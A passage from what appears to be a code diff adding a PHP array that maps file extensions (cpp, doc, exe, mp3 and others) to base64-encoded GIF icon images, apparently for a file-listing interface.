+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_crl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_crt"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_css"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_dot"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///8DAwAAA/4CAgICAAP//AAAAAANW".
+"eHrV/gWsYqq9cQDNN3gCAARkSQ5m2K2A4AahF2wBJ8AwjWpz6N6x2ar2y+1am9uoFNQtB0WVybQk".
+"xVi2V0hBmHq3B8JvPCZIuAKxOp02L8KEuFwuSQAAOw==",
+"ext_dsp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///wAAgICAgAAAAAAAAAAAAAAAAAND".
+"SATc7gqISesE0WrxWPgg6InAYH6nxz3hNwKhdwYqvDqkq5MDbf+BiQ/22sWGtSCFRlMsjCRMpKEU".
+"Sp1OWOuKXXSkCQA7",
+"ext_dsw"=>
+"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgQAAAP///wAAgAAAAAIrnI+py+0CYxwgyUvr".
+"AaH7AIThBnJhKWrc16UaVcbVSLIglbipw/f+D0wUAAA7",
+"ext_eml"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEoALAAAAAAQABAAhgAAAHBwcP7//3l+qc3MzP3+/+ny/ZGexQ+L".
+"/1qh9C1kvVBQg////zVe+NaSdubx9zSq/wWV/4TF/xiV9oWp3EBu6Fy4/w2c/nGKtqvZ8QKX/05j".
+"kkZzxSyo//Dx8vz8/G17qfz9/q7h/wmQ/+31+lZzqnyWw1p5sRxJlkJsr+fy+D+X7wt76ou26ROD".
+"7AyN//P5/1yb5/r8/tHm8tvr9NPV11GN2E1VbzhVvDFW7WSG04NNL3yOwi5Q5BOg/2JjlgOV+/r6".
+"+mhuoWO6/0ZloBtNroag1qrd/7rt/yZ0/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAe1gEqCg0oJCSWEiYMJSCI2KIpKCIIJRy0KOBxEhBQUCBQJEisKB6Wl".
+"A4JGAggWHRMKH0EfIQUGAwFKJgwICA1FJAW0Dg4wt0oYDA0VPRw8Bc87Dra4yAweBNjYNTQz00og".
+"MgLiAgXKORUN3kIFAtfZEx0aQN4/4+IZFxcWEhHeGw8AVWSYEAGCBAv9jC1YEMOFDggvfAwBsUDD".
+"QlxKAgRQwCLJCAgbNJ7QiHHQxhQ3SkYSRHJlIAA7",
+"ext_exc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAgv///4CAgAAAAMDAwAAAAAAAAAAAAAAAAAM6".
+"SBTcrnCBScEYIco7aMdRUHkTqIhcBzjZOb7tlnJTLL6Vbc3qCt242m/HE7qCRtmMokP6jkgba5pJ".
+"AAA7",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_fla"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_fon"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAICAgMDAwAAA/wAAAAAAAAAAAANJ".
+"WLLc9VCASecQ8MlKB8ARRwVkEDabZWrf5XarYglEXQNDnNID0Q+50ETywwVZnwXApxJWmDgdx9ZE".
+"VoCeo0wEi2C/31hpTF4lAAA7",
+"ext_gif"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEYALAAAAAAQABAAhgAAAGZmZoWm2dfr/sjj/vn7/bfZ/bnK+Ofy".
+"/cXX/Jam05GYyf7LAKnT/QNoAnCq0k5wUJWd0HSDthZ2E0Om94my52N3xpXF+d3k6/7nkebs8zuh".
+"J9PY6HmHyXuSxXmb2YUeCnq68m10p3Z6w3GsUEisMWuJVlZswUGV5H1uo2W0knK1qZSkyqG644WZ".
+"yYWIs4uTtaux+MfL/uXn5/7tsZvD6q7F28pjIIp4hMhsFIglCqxWKLOLdP/VM/7bU9WNTeeCKOey".
+"LnZZhjhwR1x5Zx1oLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAevgAKCg4MBRoeIAhkFjI0CIYaIRgIMPjSNBRQUKJGHAj0MDEEFCAgJ".
+"CTELnYoMOUA/GggDAzIHqwU8OzcgQrMDCbaJBQY4OikjFgQEwKulBBUKEScWp8GesbIGHxE1RTbW".
+"Ri4zsrPPKxsO4B4YvsoGFyroQ4gd7APKBAbvDyUTEIcSONxzp6/BgQck/BkJiE+fgQYGWwQwQcSI".
+"CAUYFbBYwHEBjBcBQh4KSbIkSUSBAAA7",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_ht"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAICAgMDAwP8AAP///wAA/wAAgAD//wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARMEEk0pr2VynxnHQEYjGM3nESqCsB2fkAss9gJHEVu0B4S".
+"EICcjqfxAYWFXevyAxieT+IkIKhaq0sLaUtiqr6qrPFKFgdkaHRnzW5PIgA7",
+"ext_hta"=>
+"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgf///wAAAACAAAAAAAI63IKpxgcPH2ouwgBC".
+"w1HIxHCQ4F3hSJKmwZXqWrmWxj7lKJ2dndcon9EBUq+gz3brVXAR2tICU0gXBQA7",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_htm"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_img"=>
+"R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV".
+"Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp".
+"qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq".
+"BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==",
+"ext_inf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_isp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAAP8A/wCAgAD/////AP///8DAwICA".
+"gIAAgACAAAD/AAAAAAAAAAAAAAAAAARakMl5xjghzC0HEcIAFBrHeALxiSQ3LIJhEIkwltOQxiEC".
+"YC6EKpUQBQCc1Oej8B05R4XqYMsgN4ECwGJ8mrJHgNU0yViv5DI6LTGvv1lSmBwwyM1eDmDP328i".
+"ADs=",
+"ext_ist"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAzmQBmzAAAAABmmQCZzACZ/wAzzGaZzDOZ".
+"/5n//wBm/2bM/zPM/zOZzMz//zNmzJnM/zNmmQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV1oASMZDlKqDisQRscQYIAKRAFw3scTSPPKMDh4cI9dqRgi0BY4gINoIhQ".
+"QBQUhSZOSBMxIIkEo5BlrrqAhWO9KLgIg5NokYCMiwGDHICwKt5NemhkeEV7ZE1MLQYtcUF/RQaS".
+"AGdKLox5I5Uil5iUZ2gmoichADs=",
+"ext_jfif"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_m1v"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A".
+"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW".
+"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ".
+"BHx9IBOAg4SIDBEAOw==",
+"ext_m3u"=>
+"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4".
+"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh".
+"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ".
+"PXeKNQMPPml9NVaMBDUVIQA7",
+"ext_mdb"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM".
+"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7",
+"ext_mid"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_midi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_mov"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEU/DIg6q1M6PH+6OZtHnc8SDhSAIsoJHeAQiTCsuCoOR8zlU4lmIIGApm".
+"CBdL1hruirLoQec0so5SQYKomAEeSxezRe5IRTCzGJ3+rEGhzJtMb0UAADs=",
+"ext_mp3"=>
+"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP".
+"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".
+"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".
+"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".
+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mp4"=>
+"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP".
+"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".
+"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".
+"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".
+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
